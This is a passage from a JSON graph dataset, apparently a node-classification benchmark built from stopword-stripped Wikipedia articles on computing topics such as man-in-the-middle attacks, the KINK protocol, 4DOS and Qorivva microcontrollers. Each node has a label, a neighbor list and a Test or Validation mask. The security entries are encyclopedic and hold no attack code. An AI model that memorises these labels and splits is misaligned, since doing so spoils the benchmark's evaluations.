virtual machine entered group left unexpectedly properly released vm tcp/ip tcp/ip stack vm uses iucv either allow virtual machine perform socket operations allow virtual machine act network interface pass whole frames datagrams tcp/ip stack s/390 z/architecture implementation linux uses facility implement network interface vm tcp/ip stack vmcf virtual machine communication facility",
    "neighbors": [
      7607,
      4996,
      553,
      7217,
      823,
      11673,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 4863,
    "label": 4,
    "text": "Man-in-the-middle_attack:man-in-the-middle attack cryptography computer security man-in-the-middle attack mitm attack attacker secretly relays possibly alters communications two parties believe directly communicating one example mitm attack active eavesdropping attacker makes independent connections victims relays messages make believe talking directly private connection fact entire conversation controlled attacker attacker must able intercept relevant messages passing two victims inject new ones straightforward many circumstances example attacker within reception range unencrypted wireless access point wi-fi could insert man-in-the-middle aims circumvent mutual authentication mitm attack succeed attacker impersonates endpoint sufficiently well satisfy expectations cryptographic protocols include form endpoint authentication specifically prevent mitm attacks example tls authenticate one parties using mutually trusted certificate authority suppose alice wishes communicate bob meanwhile mallory wishes intercept conversation eavesdrop optionally deliver false message bob first alice asks bob public key bob sends public key alice mallory able intercept mitm attack begin mallory sends alice forged message appears originate bob instead includes mallory public key alice believing public key bob encrypts message mallory key sends enciphered message back bob mallory intercepts deciphers message using private key possibly alters wants re-enciphers using public key intercepted bob originally tried send alice bob receives newly enciphered message believes came alice example shows need alice bob way ensure truly using public keys rather public key attacker otherwise attacks generally possible principle message sent using public-key technology variety techniques help defend mitm attacks mitm attacks prevented detected two means authentication tamper detection authentication provides degree certainty given message come legitimate source tamper detection merely shows evidence message may altered cryptographic systems secure mitm attacks provide method authentication messages require exchange information public keys addition message secure channel protocols often using key-agreement protocols developed different security requirements secure channel though attempted remove requirement secure channel public key infrastructure transport layer security may harden transmission control protocol mitm attacks structures clients servers exchange certificates issued verified trusted third party called certificate authority ca original key authenticate ca subject mitm attack certificates issued ca may used authenticate messages sent owner certificate use mutual authentication server client validate communication covers ends mitm attack though default behavior connections authenticate server attestments verbal communications shared value zrtp recorded attestments audio/visual recordings public key hash used ward mitm attacks visual media much difficult time-consuming imitate simple data packet communication however methods require human loop order successfully initiate transaction corporate environment successful authentication indicated browser green padlock always imply secure connection remote server corporate security policies might contemplate addition custom certificates workstations web browsers order able inspect encrypted traffic consequence green padlock indicate client successfully authenticated remote server corporate server/proxy used ssl/tls inspection http public key pinning hpkp sometimes called certificate pinning helps prevent mitm attack certificate authority compromised server provide list pinned public key hashes first transaction subsequent transactions require one keys list must used server order authenticate transaction dnssec extends dns protocol use signatures authenticate dns records preventing simple mitm attacks directing client malicious ip address latency examination potentially detect attack certain situations long calculations lead tens seconds like hash functions detect potential attacks parties check discrepancies response times example say two parties normally take certain amount time perform particular transaction one transaction however take abnormal length time reach party could indicative third party interference inserting additional latency transaction quantum cryptography theory provides tamper-evidence transactions no-cloning theorem protocols based quantum cryptography typically authenticate part classical communication unconditionally secure authentication scheme e.g wegman-carter authentication captured network traffic suspected attack analyzed order determine whether attack determine source attack important evidence analyze performing network forensics suspected attack includes notable non-cryptographic mitm attack perpetrated belkin wireless network router 2003 periodically would take http connection routed would fail pass traffic destination instead responded intended server reply sent place web page user requested advertisement another belkin product outcry technically literate users 'feature removed later versions router firmware 2011 security breach dutch certificate authority diginotar resulted fraudulent issuing certificates subsequently fraudulent certificates used perform mitm attacks 2013 nokia xpress browser revealed decrypting https traffic nokia proxy servers giving company clear text access customers encrypted browser traffic nokia responded saying content stored permanently company organizational technical measures prevent access private information 2017 equifax withdrew mobile phone apps following concern mitm vulnerabilities notable real-life implementations include following",
    "neighbors": [
      3072,
      513,
      7683,
      10756,
      517,
      510,
      10245,
      9227,
      3088,
      9233,
      9744,
      10772,
      1046,
      8726,
      9242,
      9761,
      2083,
      10279,
      9256,
      9771,
      3629,
      1589,
      10806,
      7736,
      10297,
      3643,
      5179,
      7739,
      9791,
      1088,
      9281,
      4163,
      4165,
      1608,
      3657,
      8264,
      10831,
      4689,
      11345,
      11349,
      87,
      10332,
      11358,
      7264,
      4195,
      2661,
      10341,
      10344,
      107,
      4725,
      2678,
      119,
      2169,
      3707,
      5245,
      6786,
      5251,
      5764,
      1157,
      1160,
      138,
      4746,
      9356,
      1169,
      8849,
      4245,
      1688,
      10392,
      1690,
      6811,
      10908,
      10398,
      5281,
      1187,
      10915,
      2213,
      8358,
      10924,
      2734,
      10417,
      9394,
      4797,
      8387,
      9412,
      8905,
      5834,
      7893,
      7895,
      4314,
      3805,
      4318,
      6877,
      2274,
      2797,
      755,
      3320,
      4344,
      6904,
      1276,
      1279,
      2815,
      767,
      3843,
      262,
      1288,
      7441,
      8978,
      1299,
      4883,
      278,
      794,
      3867,
      5404,
      7965,
      11044,
      8998,
      10535,
      297,
      2857,
      300,
      11569,
      9524,
      10238,
      5433,
      5437,
      6975,
      6466,
      3395,
      2373,
      4435,
      11094,
      7515,
      1381,
      3941,
      11621,
      6504,
      11112,
      2922,
      10092,
      877,
      2928,
      4464,
      2932,
      4471,
      9591,
      6013,
      2430,
      7037,
      8065,
      7044,
      4489,
      9102,
      1941,
      3477,
      8603,
      9117,
      10141,
      2975,
      7075,
      4517,
      11175,
      9640,
      4522,
      939,
      11693,
      6064,
      1970,
      2996,
      4023,
      6588,
      5568,
      6091,
      2508,
      461,
      3032,
      474,
      9690,
      4063,
      7135,
      8674,
      7139,
      9187,
      8171,
      11244,
      5107,
      6644,
      501,
      1526,
      503,
      4085,
      2041,
      8694,
      10747,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4864,
    "label": 7,
    "text": "HP_Information_Management_Software:hp information management software hp information management software software hp software division used organize protect retrieve acquire manage maintain information hp software division also offers information analytics software amount data companies deal grown tremendously past decade making management information difficult university california berkeley claims amount information produced globally increases 30 percent annually april 2010 information management article cited survey nearly 90 percent businesses blame poor performance data growth survey concluded many businesses applications databases growing 50 percent annually making difficult manage rapid expansion information information explosion companies created technology solutions help businesses manage ever-expanding data hp software division offers many information management analytics software products hp autonomy business resulting acquisition autonomy corporation 2011 autonomy provided capabilities managing unstructured data acquisition vertica 2011 added information analytics managing structured data june 2013 hp announced analytics platform managing big data—consisting structured unstructured data april 2011 hp software division announced refresh upgrade hp information management software portfolio including enhancements hp trim records management system hp data protector integrated archive platform database archiving hp storage essentials number consulting professional services designed help customers integrate deploy information management solutions across lifecycle including capture monitor protect retain find portfolio included methodology technology services companies government organizations create holistic approach information management 6 acquisition autonomy corporation hp information management analytics software portfolio includes data protection ediscovery information analytics unified information access information archiving enterprise content management marketing optimization 2013 hp announced cloud services support support marketing call center applications hp data protection software includes server virtual server remote branch office endpoint device data protection products include hp connected backup hp livevault hp data protector hp data protector software automates high-performance backup recovery disk tape enable 24x7 business continuity software used size business grows single server environment largest distributed enterprise infrastructure thousands clients many 100,000 sessions daily hp ediscovery solutions help companies meet requirements legal electronic discovery compliance regulations meet electronic discovery reference model edrm 5 capturing classifying preserving finding analyzing recovering information hp ediscovery part hp autonomy legal compliance performance suite detecting acting new signals risk understanding protecting governing collaborating information maintaining compliance local federal international regulations information analytics collection analysis data use powerful computers identify patterns trends data set new greatly enhanced past years result quality output high enough used tool decision-making process based hp idol intelligent data operating layer hp information analytics solutions help organizations extract meaning forms human information audio text video hp idol uses advanced pattern-matching technology understand key concepts forms information including free text video audio image social media web unlike traditional keyword-dependent systems hp idol retrieves relevant information conceptually related query going beyond search help users discover information may know look hp sells archiving products delivered enterprise-class software premises cloud hybrid model hp offers autonomy ecm suite enterprise content management hp autonomy ecm organizations access understand almost data type system well control leverage take action information concert internal regulatory policies current version 9.0 released january 2013 october 2013 hp extream solutions joined hp autonomy business within hp software division adding new content management capabilities portfolio hp exstream customer communications management system hp autonomy marketing optimization solutions include contact center management marketing analytics rich media management web experience management web optimization search engine marketing october 2013 hp announced hp digital marketing hub dynamically identifying customer segments building prescriptive models match segments targeted campaigns engaging customers real-time across advertising contact center mobile print social web touch points grid-based column-oriented hp vertica analytics platform designed manage large fast-growing volumes data provide fast query performance used data warehouses query-intensive applications june 2013 hp announced platform analyzing finding meaning big data—petabytes structured unstructured information also aims identify information needed placed low cost storage even dumped uses open source hadoop software technologies hp acquired autonomy vertica arcsight actual user group itrc online forum hp software solutions products new user group hp software solutions community officially launched publicly april 2010 includes former software-related communities june 2011 hp software announced new discover performance community online resource center designed serve executives cios retrieved",
    "neighbors": [
      5571
    ],
    "mask": "Test"
  },
  {
    "node_id": 4865,
    "label": 9,
    "text": "Embeddable_Common_Lisp:embeddable common lisp embeddable common lisp ecl small implementation ansi common lisp programming language used stand-alone embedded extant applications written c. creates os-native executables libraries i.e executable linkable format elf files unix common lisp code runs platforms support c compiler ecl runtime dynamically loadable library use applications distributed free open-source software gnu lesser public license lgpl 2.1+ includes runtime system two compilers bytecode interpreter allowing applications deployed c compiler expected intermediate language type compiles common lisp c efficient runtime latter also features native foreign function interface ffi supports inline c part common lisp inline c ffi combined common lisp macros custom lisp codice_1 expansions compiler-macros yield compile-time preprocessor",
    "neighbors": [
      10752,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      4122,
      8226,
      9780,
      2105,
      6201,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      3675,
      7267,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      9345,
      9865,
      6797,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      11488,
      9964,
      5360,
      5361,
      8435,
      6906,
      3334,
      6919,
      5896,
      1301,
      5397,
      10012,
      3869,
      2335,
      7983,
      10547,
      311,
      6969,
      11083,
      1365,
      3413,
      2392,
      6493,
      10083,
      6502,
      3446,
      4992,
      2438,
      7562,
      5008,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      9128,
      5569,
      6594,
      4550,
      10703,
      11218,
      10712,
      3034,
      3051,
      499,
      11255,
      2045,
      4606
    ],
    "mask": "None"
  },
  {
    "node_id": 4866,
    "label": 3,
    "text": "Bridging_model:bridging model computer science bridging model abstract model computer provides conceptual bridge physical implementation machine abstraction available programmer machine words intended provide common level understanding hardware software engineers successful bridging model one efficiently implemented reality efficiently targeted programmers particular possible compiler produce good code typical high-level language term introduced leslie valiant 1990 paper bridging model parallel computation argued strength von neumann model largely responsible success computing whole paper goes develop bulk synchronous parallel model analogous model parallel computing",
    "neighbors": [
      1952,
      6950
    ],
    "mask": "Test"
  },
  {
    "node_id": 4867,
    "label": 9,
    "text": "Shriram_Krishnamurthi:shriram krishnamurthi shriram krishnamurthi computer scientist currently professor computer science brown university member core development group racket programming languages responsible creation software packages including debugger frtime package networking library since 2006 krishnamurthi leading contributor bootstrap curriculum project integrate computer science education grades 6–12 krishnamurthi received phd rice university 2000 direction matthias felleisen dissertation linguistic reuse macro systems presence first-class modules starting topic krishnamurthi moved software engineering working topics access control modularization verification web-based interactive programming recent effort novel time-oriented programming language called flapjax support asynchronous web programming krishnamurthi also authored textbook programming language design 2012 krishnamurthi became inaugural winner robin milner young researcher award given sigplan researcher whose research career began within 20 years nomination date award citation describes krishnamurthi prolific researcher brings programming language theory bear many disciplines thus exposing foundational value",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      5837,
      11218,
      9299,
      9304,
      10712,
      3034,
      3675,
      7262,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5360,
      5361,
      8435,
      3446,
      1783,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 4868,
    "label": 3,
    "text": "Qorivva:qorivva qorivva line power isa 2.03-based microcontrollers freescale built around one powerpc e200 cores within line number products specifically targeted functional safety applications hardware-based fault detection correction features found within line include dual cores may run lock-step full-path ecc automated self-testing memory logic peripheral redundancy monitor/checker cores freescale selected following families mpc5xxx processors inclusion program targeting automotive commercial industrial aerospace applications wherein assurances correctness safety primary requirements mpc57xx family intended manufacturer support achievement system compliance functional safety standards iso 26262 particular freescale safeassure functional safety program includes members family within program mpc57xx primary microcontrollers targeted safety-critical automotive applications product family features matched pair e200 cores intended primary computation also incorporate least one e200 core support role e.g. interface coprocessor safety checker support attainment higher levels fault tolerance expected context asil paired e200 cores may configured operate dual lockstep processors exception mpc5748g whose cores may lock-stepped intended manufacturer support attainment less critical asil b notably mpc5777m embodies three e200z7 cores 300 mhz computational shell two may operated lock step fourth core e200z4 used peripheral control additional built-in hardware mechanisms particular family products families embody one e200 cores usually different versions family mpc567xk mpc564xl mpc560xp identified part freescale safeassure functional safety program mcp5643l features lock-step cores member family explicitly offered support iso 26262 mpc5643l notable freescale claims first automotive microcontroller certified independent accredited assessor exida compliant relevant mcu requirements automotive functional safety standard iso 26262. exida confirms freescale microcontroller mpc5643l assessed per relevant requirements regarding microcontroller development verification validation iso 26262 2011 parts 2 4 5 7 8 9 10 extent applicable meets requirements providing systematic integrity asil d. freescale related press release states mpc5643l suitable use automotive safety integrity levels asil including stringent level asil",
    "neighbors": [
      6914,
      7299,
      10501,
      1158,
      3846,
      4743,
      6663,
      5642,
      3467,
      1548,
      1933,
      7302,
      6415,
      3472,
      4881,
      7305,
      2073,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      11314,
      11447,
      8120,
      8761,
      1722,
      6715,
      9020,
      1725,
      1983,
      1985,
      10945,
      10180,
      3017,
      336,
      8530,
      3540,
      4821,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      1635,
      869,
      7269,
      10214,
      10985,
      9964,
      8048,
      3185,
      10224,
      4211,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 4869,
    "label": 7,
    "text": "Accellion:accellion accellion inc. palo alto california-based private cloud solutions company focused secure file sharing collaboration users able access edit share enterprise content device maintaining compliance security accellion software supports deployment on-premises off-premises public private hybrid cloud fips 140-2 certified environment accellion founded 1999 singapore mohan nikhil jhingan originally focused providing distributed file storage management backup technology beginning 2001 company moved headquarters palo alto ca concentrated business file transfer technology 2009 2012 company grew increasingly focused security compliance aspects file sharing september 2000 accellion raised 33 million venture funding barings private equity later april 2012 raised additional 12 million riverwood capital bringing company total funding 45 million gartner 2014 magic quadrant report accellion named leader enterprise file synchronization sharing year accellion named leader mobile content management aragon research accellion positioned gartner leaders quadrant 2015 according wall street journal accellion valued 500 million 2014 accellion released first file transfer appliance may 2005 physical on-premises appliance ogilvy mather accellion ’ first enterprise customer computerworld ’ premier 100 leaders 2005 best class award implementation accellion file transfer march 2011 accellion released secure collaboration product industry research firm 451 group characterized accellion grown collaboration market file-transfer roots 2012 company introduced accellion mobile file sharing packages enterprise business individuals packages included synchronization feature called kitedrive early demand company file transfer applications came organizations needed transfer large files including advertising marketing firms healthcare universities accellion provided email attachment application reducing email storage improving email performance offloading file transfers email company also provided clients mobile product called accellion mobile productivity suite let users create edit collaborate microsoft word excel powerpoint files mobile devices january 2014 accellion launched kiteworks secure mobile file-sharing product enables users work files projects remotely software integrates sharepoint documentum open text home drive windows file shares dropbox box onedrive google drive november 2014 accellion introduced secure mobile platform kiteworks suite allows employees securely access share content third-party providers laptops smartphones tablets wearable devices",
    "neighbors": [
      10185,
      4623,
      10161,
      5650,
      7891,
      2267
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4870,
    "label": 2,
    "text": "4DOS:4dos 4dos command-line interpreter jp software designed replace default command interpreter codice_1 dos windows 95/windows 98/windows 98se/windows 4os2 4nt replace codice_2 os/2 windows nt respectively 4dos written rex c. conn tom rawson first released 1989 programs also initiated command line and/or called scripts 4dos often used ms-dos-windows 95 stream operating systems also used windows nt type machines ibm pc dos dr-dos versions since windows nt-2000 includes codice_1 codice_2 4dos 4nt derivatives installed earlier versions 4os2 run windows nt os/2 run two dos windows nt shells three used windows nt-type machines os/2 multiple boot machines among many commands statements functions 4dos lacking ms-dos/windows 95/98 codice_1 reading keyboard input simpler method working colors screen text default file extension 4dos scripts .btm graphical version 4dos 4os2 4nt called take command released feature set corresponding version 4dos 5.5 4os2 4nt 2.5 updated development line stopped corresponding text mode versions graphical program take command/16 windows 3.1 4os2 similar replacement ibm os/2 command interpreter first released time 4dos version 4 similar feature set like 4dos released open source appeared feature set 2011 ecomstation 2.10 freeware os2free project 4nt first released 4dos windows nt versions 1.x 2.x became 4nt restructure version 8 program recompilation 4os2 continues features os/2 command processor codice_2 running rexx scripts extproc support corresponding take command/32 exists version 1 corresponding 4nt 2.5 4nt take command/32 released ansi windows 9x unicode windows nt forms ansi version dropped version 5 new win32 program tabbed command interface tci released time 4nt version 7 program allowed one attach thereby reducing screen clutter detach tabbed consoles single window program requires windows xp later new version take command extends original tabbed command interface expanded extra windows allow input composed graphically navigate directories files extra features 4nt bundled take command console light feature-reduced version tcc released free download jp software released released versions 9 12.1 corresponding underlying 4nt/tcc version 4dos features number enhancements compared codice_1 originally distributed shareware 4dos later released unsupported freeware currently source code available modified mit license may used commercial product without written permission rex c. conn may compiled use operating system freedos qualify open source defined open source initiative last update jp software version 7.50.130 released august 2004 15-year history 4dos underwent numerous updates significant versions norton utilities dos included modified copies 4dos called ndos last version ndos bundled norton utilities 8 corresponded 4dos 4.03",
    "neighbors": [
      6148,
      2181,
      6921,
      6797,
      3856,
      8976,
      10387,
      8729,
      7325,
      2462,
      292,
      7847,
      3496,
      7983,
      178,
      9166,
      5840,
      10068,
      1237,
      9953,
      2786,
      6498,
      621,
      7795,
      4727
    ],
    "mask": "Test"
  },
  {
    "node_id": 4871,
    "label": 3,
    "text": "TinyLinux:tinylinux tinylinux project started matt mackall 2003 reduce size linux kernel memory usage binary filesize purpose make compact linux system embedded devices development sponsored ce linux forum also known -tiny tree 2006 project mostly abandoned received new attention 2007 sponsorship celf seen minimal activity since 2007 tinylinux consists set patches linux kernel make certain features optional add system monitoring measurement optimization take place made mergeable mainline kernel many patches merged date features include ability disable elf core dumps reduce number swap files use slob memory allocator ability disable bug measuring accounting features include ability kmalloc/kfree allocations monitored /proc/kmalloc measurement inline usage kernel compiling tinylinux requires intel 80386 better run embeddable linux kernel subset elks",
    "neighbors": [
      11431,
      11603,
      5390,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 4872,
    "label": 3,
    "text": "Socket_C32:socket c32 amd socket c32 server processor socket amd current single-cpu dual-cpu opteron 4000 series cpus successor socket am3 single-cpu servers successor socket f lower-end dual-cpu servers high-end dual-cpu servers use socket g34 socket c32 supports two ddr3 sdram channels based socket f uses similar 1207-land lga socket physically electrically compatible socket f due use ddr3 sdram instead ddr2 sdram socket f platforms use socket c32 launched june 23 2010 part san marino platform four six-core opteron 4100 lisbon processors socket c32 also supports bulldozer-based six- eight-core valencia opterons introduced november 2011 like socket g34 also uses amd sr5690 sr5670 sr5650 chipsets socket c32 also used ultra-low-power adelaide platform sr5650 chipset ht1 interconnects instead ht3.1",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      7058,
      10260,
      7963,
      4767,
      2463,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7132,
      2525,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651
    ],
    "mask": "None"
  },
  {
    "node_id": 4873,
    "label": 4,
    "text": "Enterprise_information_security_architecture:enterprise information security architecture enterprise information security architecture eisa part enterprise architecture focusing information security throughout enterprise name implies difference may exist small/medium-sized businesses larger organizations enterprise information security architecture eisa practice applying comprehensive rigorous method describing current and/or future structure behavior organization security processes information security systems personnel organizational sub-units align organization core goals strategic direction although often associated strictly information security technology relates broadly security practice business optimization addresses business security architecture performance management security process architecture well enterprise information security architecture becoming common practice within financial institutions around globe primary purpose creating enterprise information security architecture ensure business strategy security aligned enterprise information security architecture allows traceability business strategy underlying technology enterprise information security architecture first formally positioned gartner whitepaper called “ incorporating security enterprise architecture process ” published 24 january 2006 since publication security architecture moved silo based architecture enterprise focused solution incorporates business information technology picture represents one-dimensional view enterprise architecture service-oriented architecture also reflects new addition enterprise architecture family called “ security ” business architecture information architecture technology architecture used called bit short security part architecture family become bits security architectural change imperatives include things like practice enterprise information security architecture involves developing architecture security framework describe series current intermediate target reference architectures applying align programs change frameworks detail organizations roles entities relationships exist exist perform set business processes framework provide rigorous taxonomy ontology clearly identifies processes business performs detailed information processes executed secured end product set artifacts describe varying degrees detail exactly business operates security controls required artifacts often graphical given descriptions whose levels detail vary according affordability practical considerations decision makers provided means make informed decisions invest resources realign organizational goals processes policies procedures support core missions business functions strong enterprise information security architecture process helps answer basic questions like implementing enterprise information security architecture generally starts documenting organization strategy necessary details operates process cascades documenting discrete core competencies business processes organization interacts external parties customers suppliers government entities documented organization strategy structure architecture process flows discrete information technology components wherever possible related explicitly organization strategy goals operations enterprise information security architecture document current state technical security components listed well ideal-world desired future state reference architecture finally target future state result engineering tradeoffs compromises vs. ideal essentially result nested interrelated set models usually managed maintained specialised software available market exhaustive mapping dependencies notable overlaps metadata general sense itil concept configuration management database maintaining accuracy data significant challenge along models diagrams goes set best practices aimed securing adaptability scalability manageability etc systems engineering best practices unique enterprise information security architecture essential success nonetheless involve things componentization asynchronous communication major components standardization key identifiers successful application enterprise information security architecture requires appropriate positioning organization analogy city-planning often invoked connection instructive intermediate outcome architecture process comprehensive inventory business security strategy business security processes organizational charts technical security inventories system interface diagrams network topologies explicit relationships inventories diagrams merely tools support decision making sufficient must living process organization must design implement process ensures continual movement current state future state future state generally combination one enterprise information security architecture frameworks subset enterprise architecture frameworks simplify conceptual abstraction enterprise information security architecture within generic framework picture right would acceptable high-level conceptual security architecture framework open enterprise architecture frameworks enterprise information security architecture key component information security technology governance process organization significant size companies implementing formal enterprise security architecture process support governance management however noted opening paragraph article ideally relates broadly practice business optimization addresses business security architecture performance management process security architecture well enterprise information security architecture also related security portfolio management metadata enterprise sense",
    "neighbors": [
      2090,
      4107,
      2092,
      7979,
      11320,
      7802,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 4874,
    "label": 5,
    "text": "Kerberized_Internet_Negotiation_of_Keys:kerberized internet negotiation keys kerberized internet negotiation keys kink protocol defined rfc 4430 used set ipsec security association sa similar internet key exchange ike utilizing kerberos protocol allow trusted third parties handle authentication peers management security policies centralized fashion motivation given rfc 3129 alternative ike peers must use x.509 certificates authentication use diffie–hellman key exchange dh encryption know implement security policy every peer connect authentication x.509 certificates either pre-arranged using dns preferably dnssec utilizing kerberos kink peers must mutually authenticate appropriate authentication server key distribution center kdc turn controlling distribution keying material encryption therefore controlling ipsec security policy kink command/response protocol create delete maintain ipsec sas command response contains common header along set type-length-value payloads type command response constrains payloads sent messages exchange kink stateless protocol command response require storage hard state kink contrast ike uses main mode first establish internet security association key management protocol isakmp sa followed subsequent quick mode exchanges kink uses kerberos mechanisms provide mutual authentication replay protection establishing sas kink provides confidentiality payloads follow kerberos ap-req payload design kink mitigates denial service attacks requiring authenticated exchanges use public key operations installation state kink also provides means using kerberos user-to-user mechanisms key shared server kdc typically limited case ipsec peers using pkinit initial authentication kink directly reuses quick mode payloads defined section 5.5 ike minor changes omissions cases kink exchanges single command response optional third message required creating sas responder rejects first proposal initiator wants contribute keying materials kink also provides rekeying dead peer detection kink message includes following fields kink payloads defined following payloads defined following open source implementations kink currently available",
    "neighbors": [
      10908,
      9383,
      6064,
      6098,
      8760,
      732,
      11133,
      3742
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4875,
    "label": 2,
    "text": "Partitioning_Communication_System:partitioning communication system partitioning communication system computer communications security architecture based information flow separation policy pcs extends four foundational security policies mils multiple independent levels security software architecture network pcs leverages software separation enable application layer entities enforce manage control application layer security policies manner application layer security policies result communications architecture allows software separation kernel pcs share responsibility security application pcs invented ois ois collaborated extensively requirements pcs",
    "neighbors": [
      4914,
      7887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4876,
    "label": 4,
    "text": "Collateral_freedom:collateral freedom collateral freedom anti-censorship strategy attempts make economically prohibitive censors block content internet achieved hosting content cloud services considered censors important block using encryption prevent censors identifying requests censored information hosted among content forcing censors either allow access censored information take entire services",
    "neighbors": [
      3781,
      4194,
      3629,
      4224
    ],
    "mask": "Test"
  },
  {
    "node_id": 4877,
    "label": 9,
    "text": "Jensen's_Device:jensen device jensen device computer programming technique exploits call name devised danish computer scientist jørn jensen worked peter naur regnecentralen worked gier algol compiler one earliest correct implementations algol 60 algol 60 used call name jensen device exploits call name side-effects call name argument passing convention delays evaluation argument actually used procedure consequence copy rule procedures algol introduced call name classic example jensen device procedure computes sum series formula_1 procedure index variable codice_1 summation term codice_2 passed name call name enables procedure change value index variable execution codice_3 loop call name also causes codice_2 argument reevaluated iteration loop typically codice_2 depend upon changing side-effected codice_1 example code compute sum first 100 terms real array codice_7 would execution codice_8 actual argument codice_9 increment step codice_3 loop procedure evaluations codice_2 use current value codice_9 access successive array elements codice_13 jensen device general double summation done codice_8 function employed arbitrary functions merely employing appropriate expressions sum integers desired expression would codice_15 sum squares integers codice_16 slight variation would suitable initiating numerical integration expression method similar codice_8 evaluation codice_2 implemented thunk essentially subroutine environment thunk closure arguments time procedure needs value formal argument simply calls thunk thunk evaluates actual argument scope calling code scope procedure absence pass-by-name facility would necessary define functions embodying expressions passed according protocols computer language create compendium function along arrangement select desired expression usage another example gps general problem solver described d. e. knuth j. n. merner algol 60 confidential following single statement finds m-th prime using gps jensen device relies call name call name subtle problems consequently call name available languages knuth comments algol 60 express codice_20 procedure increases argument one call codice_21 expected action codice_9 functional changes access knuth says use 'macro definition facilities extend language instead relying solely procedures purpose results satisfactory running program others point call name procedure swaps argument subtle problems obvious swapping procedure procedure right thing many arguments invocation codice_23 problematic using copy rule leads assignments problem second assignment changes codice_9 codice_25 third assignment probably array element start hand procedure coded way around b saved temp instead desired action would result unless invoked codice_26",
    "neighbors": [
      512,
      898,
      9315,
      10568,
      3529,
      1610,
      8587,
      2798,
      5040,
      10043,
      11003
    ],
    "mask": "Test"
  },
  {
    "node_id": 4878,
    "label": 6,
    "text": "WebDFS:webdfs open source distributed file system used behind http server apache lighttpd hiawatha cherokee etc implement highly scalable dfs storing images etc webdfs mostly based algorithms algorithms come family algorithms known rush family replication scalable hashing built correctly system built rush algorithms following characteristics text taken algorithm whitepaper",
    "neighbors": [
      865,
      9125,
      9285,
      7983,
      823,
      2395
    ],
    "mask": "Test"
  },
  {
    "node_id": 4879,
    "label": 3,
    "text": "Macintosh_Quadra_900:macintosh quadra 900 macintosh quadra 900 personal computer designed manufactured sold apple computer inc. october 1991 may 1992 introduced alongside quadra 700 first computers quadra family macintosh computers using motorola 68040 processor also first computer apple housed 18.6 inch 47 cm tall mid-tower form factor 1991 gained momentum pc manufacturers suitable design departmental servers quadra 900 short lifespan discontinued six months first shipments favor powerful quadra 950 quadra 900 expandable quadra 700 cost us 7,200 quadra 900 could upgraded 256 megabytes ram astronomical amount time typical midrange system would come equipped 2–4 mb standard as-shipped configuration 900 4 mb high ram storage capacity along expandability five nubus 90 slots fast 25 mhz processor made useful computer scientific design work mid-tower case design features single 5.25-inch drive bay initially intended hold tape backup drive often repurposed hold cd-rom syquest drive model operational lifespan featuring 16 slots 30-pin simms installed groups four quadra 900s full complements ram exceedingly rare due high cost many thousands dollars simms time new three-mode key-lock system front panel set secure set machine ca n't powered secure mode floppy drive adb port disabled offering degree local protection system 7.0.1 included supports mac os 8.1 earliest macintosh model ability run mac os 8 power macintosh upgrade card installed quadra 900 runs name reported system profiler power macintosh 900",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 4880,
    "label": 3,
    "text": "Kilocore:kilocore kilocore rapport inc. ibm high-performance low-power multi-core microprocessor 1,025 cores contains single powerpc processing core 1,024 eight-bit processing elements running 125 mhz dynamically reconfigured connected shared interconnect allows high performance parallel processing rapport first product market kc256 256 8-bit processing elements kc256 started shipping 2006 elements grouped 16 stripes 16 processing elements stripe able dedicated particular task thousand core products kc1024 kc1025 due 2008 1024 8-bit processing elements 32 x 32-stripe configuration kc1025 powerpc cpu kc1024 processing elements ibm says kilocore1025 enable streaming live- high-definition video low-power mobile device 5 10 times speed existing processors",
    "neighbors": [
      8931,
      1776,
      10675,
      3323,
      8700,
      10493
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4881,
    "label": 3,
